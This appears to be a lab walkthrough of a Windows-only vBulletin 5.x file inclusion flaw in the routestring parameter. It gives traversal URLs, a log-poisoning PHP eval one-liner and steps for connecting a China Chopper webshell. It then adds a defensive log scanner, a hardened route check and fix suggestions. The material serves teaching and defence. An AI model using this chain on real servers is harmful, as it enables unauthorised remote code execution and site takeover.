There is a file inclusion issue in vBulletin that allows a malicious visitor to include files from the vBulletin server and execute arbitrary PHP code. An unauthenticated malicious visitor can trigger the file inclusion by issuing a GET request to index.php that carries the routestring= parameter, ultimately leading to remote code execution.
When index.php receives a GET request that includes a local file through the routestring parameter, it calls helper functions layer by layer to filter the routestring value. Let's look at the main processing code.
This code is located in the file /includes/vb5/frontend/routing.php:

    if (strlen($path) > 2) {
        $ext = strtolower(substr($path, -4));
        // Static-asset extensions are never routed: answer 404 and stop.
        if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css')
            OR (strtolower(substr($path, -3)) == '.js')) {
            header("HTTP/1.0 404 Not Found");
            die('');
        }
    }
This code checks whether the value obtained from routestring ends in .gif, .png, .jpg, .css or .js; if so, a 404 header is returned and processing stops.
    // No '/' in the path: treat it as a legacy script name and hand it to the relay controller.
    if (strpos($path, '/') === false) {
        $this->controller = 'relay';
        $this->action = 'legacy';
        $this->template = '';
        $this->arguments = array($path);
        $this->queryParameters = array();
        return;
    }
The strpos() function in this code returns the position at which the / character first appears in $path. Processing continues down this branch only if it returns false, which means / cannot appear in the path.
On Linux servers, / is the directory separator when URLs and paths are processed, so other files on the website cannot be included by chaining multiple ../ segments. On Windows servers, however, / and \ are equivalent when expressing paths, and the program does not handle \ at all, which is what produces this file inclusion vulnerability on Windows servers.
Affected version
vBulletin v5.x. The discoverer of the vulnerability has contacted the vendor but has not yet received a reply.
In the practical part that follows, we deepen our understanding and use of the vulnerability step by step. First, use the page's error messages to obtain server-related information; then include the server's internal files and execute phpinfo() to verify code execution; and finally write a PHP one-liner into the website log file and include it to obtain website management permissions.
Step 1 Vulnerability verification
In this step, we simply use the error message to obtain server information, and then use the vulnerability to include and execute the phpinfo() function for verification.
1. Open the target URL 172.16.12.2/vb5/index.php; the homepage of the website is as follows:
2. Visit the vulnerable page and view the error message
Open 172.16.12.2/vb5/index.php?routestring=.\\ in the browser; the error message is as follows:
You can see that the page uses require_once() to include the current path (C:\phpstudy\WWW\vb5/core/.\\), which is not allowed, so an error is reported. The error message leaks the absolute path of the website and the website-building software: phpstudy.
When phpstudy sets up a website, by default it leaves the files l.php and phpinfo.php in the website root; website administrators usually delete or modify these two files. Because \ also acts as an escape character, and \\ and \ are equivalent when expressing paths, we use \\ to prevent escaping (the experiment can also be completed without doing so).
3. Access the phpinfo.txt file
To verify that the vulnerability allows inclusion, a phpinfo.txt file whose content calls phpinfo() is placed in the website root. We first try to access the file directly at http://172.16.12.2/phpinfo.txt:
The website displays the text content directly.
4. Include the phpinfo.txt file
We then try to include the file by opening the constructed link http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\WWW\\phpinfo.txt
Here we already know the absolute path of the website on the server, so we use multiple ..\\ segments followed by the file path to point at the location of the file to include. After the file is included, the server parses it as PHP and the phpinfo() function is executed.
phpinfo(): a PHP built-in function that outputs the configuration information of the PHP server.
Step 2 Vulnerability Exploitation
Generally, the method of exploiting PHP file inclusion vulnerabilities is to first upload a file containing malicious code through an upload point on the website, then find the path of the uploaded file, construct the URL, and execute the malicious code through the inclusion vulnerability. However, this method will not work if the website has no usable upload point, if restrictions on uploaded files prevent us from learning the file's path, or if the input parameters are filtered.
As seen above, the program restricts the suffixes of included files. With no other avenue available, we can choose to include files that already exist on the website, which is the approach used in this experiment: including the website's log files.
What is included this time is Apache's error log (error.log); in phpstudy its path is: \phpstudy\apache\logs\error.log.
1. Write the one-liner into the log
First, we construct an access link that triggers an error, so that the exploit code (a PHP one-liner) is written into the error log.
http://172.16.12.2/vb5/index.php<?php @eval($_POST[c]);?>
If this link is visited directly, the one-liner is encoded as %3C?php%20@eval($_POST[c]);?%3E, so we need to use Burp Suite to modify the packet.
Use Everything to search for BurpLoader.jar and double-click it to open Burp Suite.
Configure the browser's proxy settings:
Open the Chrome browser on the desktop, visit chrome://settings or click the Customize button on the right of the browser -> Settings to enter the settings page.
Click Show advanced settings at the bottom, find and open the Change proxy settings button, and in the pop-up choose LAN settings.
The specific configuration is shown in the figure below; confirm after modifying.
After configuring the proxy, visit the constructed link above in the browser. Burp Suite automatically intercepts the packet; open Burp Suite -> Proxy -> Intercept, right-click in the text box below and choose Send to Repeater, then click the Repeater tab and modify the intercepted packet.
We change the encoded link back to its state before encoding; the modified content is as follows:
Click the Go button to send; a 403 error is returned, and the server's error log successfully records this request in error.log.
We have successfully written the exploit code into the log.
Pay attention to the correctness of the exploit code: if incorrect code is written, the code may fail to execute when the log is included later.
Now close Burp Suite and disable the browser proxy by following the proxy setup steps above.
2. Construct the Webshell connection address
We construct the access path according to the path of the log:
http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\apache\\logs\\error.log
Connect to the one-liner with a client
Next, use China Chopper to connect to our one-liner: use Everything to search for and open chopper, right-click, choose Add, fill in our constructed link in the address bar, enter the password c on the right, select PHP (Eval) as the type, then click Add.
Double-click the link; the connection succeeds (if it cannot connect, check whether the written code is correct and whether the proxy is disabled).
Including a log file requires a known server log path, which administrators usually change in the configuration, and writing the code requires strict attention to format and encoding, so this method is not a preferred exploitation method; but when no other exploitation point is available, it is still worth trying.
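As an added example, written here and not part of the original article, the following PHP scans Apache logs for the traces this procedure leaves behind: access-log requests whose routestring contains a backslash or a dot-dot segment (the traversal used above, including percent-encoded and double-encoded forms), and error-log entries that contain a PHP open tag, which is what the one-liner written in step 1 looks like from the defender's side. The log lines, timestamps and IP addresses are constructed for the example; the function names are assumptions.

```php
<?php
// Added example, not code from the original article: a scanner for the two
// traces this technique leaves in Apache logs. Sample log lines are constructed.
//  (a) access log: requests whose routestring carries '\' or a '..' segment;
//  (b) error log: entries containing a PHP open tag, i.e. a payload written
//      into the log so that it can later be pulled back in by file inclusion.

// Each finding is [line number, rule name, evidence].
function scanAccessLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        // Pull the request target out of the Combined Log Format request field.
        if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        parse_str($query, $params);            // decodes one layer of %xx
        if (!isset($params['routestring'])) {
            continue;
        }
        // Decode once more so a double-encoded %255c also becomes a literal '\'.
        $route = rawurldecode((string) $params['routestring']);
        // vBulletin routes never contain a backslash or a dot-dot segment.
        if (strpos($route, '\\') !== false
            || preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $route)) {
            $findings[] = [$i + 1, 'routestring-traversal', $route];
        }
    }
    return $findings;
}

function scanErrorLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        // A PHP open tag has no business in an Apache error log.
        if (stripos($line, '<?php') !== false || strpos($line, '<?=') !== false) {
            $findings[] = [$i + 1, 'php-tag-in-error-log', trim($line)];
        }
    }
    return $findings;
}

// Constructed sample lines (Combined Log Format and Apache error-log format).
$accessLog = [
    '172.16.12.9 - - [10/Oct/2023:10:00:01 +0800] "GET /vb5/index.php?routestring=forum HTTP/1.1" 200 5120',
    '172.16.12.9 - - [10/Oct/2023:10:00:07 +0800] "GET /vb5/index.php?routestring=.%5C%5C HTTP/1.1" 200 2110',
    '172.16.12.9 - - [10/Oct/2023:10:00:12 +0800] "GET /vb5/index.php?routestring=%5C%5C..%5C%5C..%5C%5C..%5C%5Cphpstudy%5C%5CWWW%5C%5Cphpinfo.txt HTTP/1.1" 200 60210',
    '172.16.12.9 - - [10/Oct/2023:10:00:15 +0800] "GET /vb5/index.php?routestring=%255c..%255c..%255cphpstudy%255capache%255clogs%255cerror.log HTTP/1.1" 200 990',
    '172.16.12.9 - - [10/Oct/2023:10:00:20 +0800] "GET /vb5/index.php?routestring=showthread&t=12 HTTP/1.1" 200 7400',
];
$errorLog = [
    '[Tue Oct 10 10:00:07 2023] [error] [client 172.16.12.9] File does not exist: C:/phpstudy/WWW/favicon.ico',
    '[Tue Oct 10 10:00:09 2023] [error] [client 172.16.12.9] client denied by server configuration: C:/phpstudy/WWW/vb5/index.php<?php @eval($_POST[c]);?>',
];

// Lines 2, 3 and 4 of the access log and line 2 of the error log are reported.
foreach (array_merge(scanAccessLog($accessLog), scanErrorLog($errorLog)) as [$n, $rule, $evidence]) {
    printf("line %d  %-22s %s\n", $n, $rule, $evidence);
}
```

On a real deployment, replace the two arrays with the contents of the live access.log and error.log (for example via file() with FILE_IGNORE_NEW_LINES) and run the script from the php CLI on a schedule; the routestring rule is the cheaper signal, since the request is logged even when the inclusion itself fails, while a PHP tag in error.log shows that the staging step of the technique has already taken place.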
Fix suggestions
(1) Wait for the official patch; individual users are advised to switch to an alternative product.
(2) Enterprise users can modify the website source code to add filtering of the \ character.
(3) Website administrators can move the server's sensitive information files so that the vulnerability cannot be exploited further.
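As an added example (not vBulletin's code and not from the original article), the following PHP places the routing check quoted above, which only looks for /, beside a hardened version that implements the filtering suggested in item (2): it rejects \ as well as /, dot-dot segments, NUL bytes and percent-encoded input, and allow-lists the shape a legacy route may take. The function names and sample inputs are assumptions for illustration; the hardened check shows the idea rather than a drop-in patch for routing.php.

```php
<?php
// Added example, not vBulletin's code: the page's routing check (only '/'
// is treated as a separator) beside a hardened check that also filters '\'.
// Function names and sample inputs are assumptions for illustration.

// Check as quoted from routing.php: on Windows, "\\..\\..\\file" passes it.
function legacyPathAccepted(string $path): bool
{
    return strpos($path, '/') === false;
}

// Hardened check: reject both separator characters, dot-dot segments,
// NUL bytes and percent-encoded input, then allow-list the route shape.
function hardenedPathAccepted(string $path): bool
{
    if ($path === '' || strlen($path) > 255) {
        return false;
    }
    // $path has already been URL-decoded by PHP; if decoding it again changes
    // it, the client double-encoded something (for example %255c): refuse it.
    if (rawurldecode($path) !== $path) {
        return false;
    }
    // '/', '\' or NUL anywhere in the string: not a legacy script name.
    if (strpbrk($path, "/\\\0") !== false) {
        return false;
    }
    if (strpos($path, '..') !== false) {
        return false;
    }
    // Legacy routes are plain script names with at most one extension.
    return preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?$/', $path) === 1;
}

// Constructed inputs: two benign routes, the two requests shown on this page,
// a percent-encoded variant and a forward-slash traversal.
$samples = [
    'forum.php',
    'showthread',
    ".\\",
    "\\..\\..\\..\\..\\..\\..\\phpstudy\\WWW\\phpinfo.txt",
    '%5c..%5c..%5cphpstudy%5cWWW%5cphpinfo.txt',
    '../core/vb/vb.php',
];
// The original check accepts everything except the last sample; the hardened
// check accepts only the first two.
foreach ($samples as $s) {
    printf("%-50s legacy=%-6s hardened=%s\n", $s,
        legacyPathAccepted($s) ? 'accept' : 'reject',
        hardenedPathAccepted($s) ? 'accept' : 'reject');
}
```

The allow-list at the end is the part that matters most: rejecting \ closes the Windows bypass described above, but an allow-list of what a route may contain also covers separators and encodings that a deny-list of individual characters would miss.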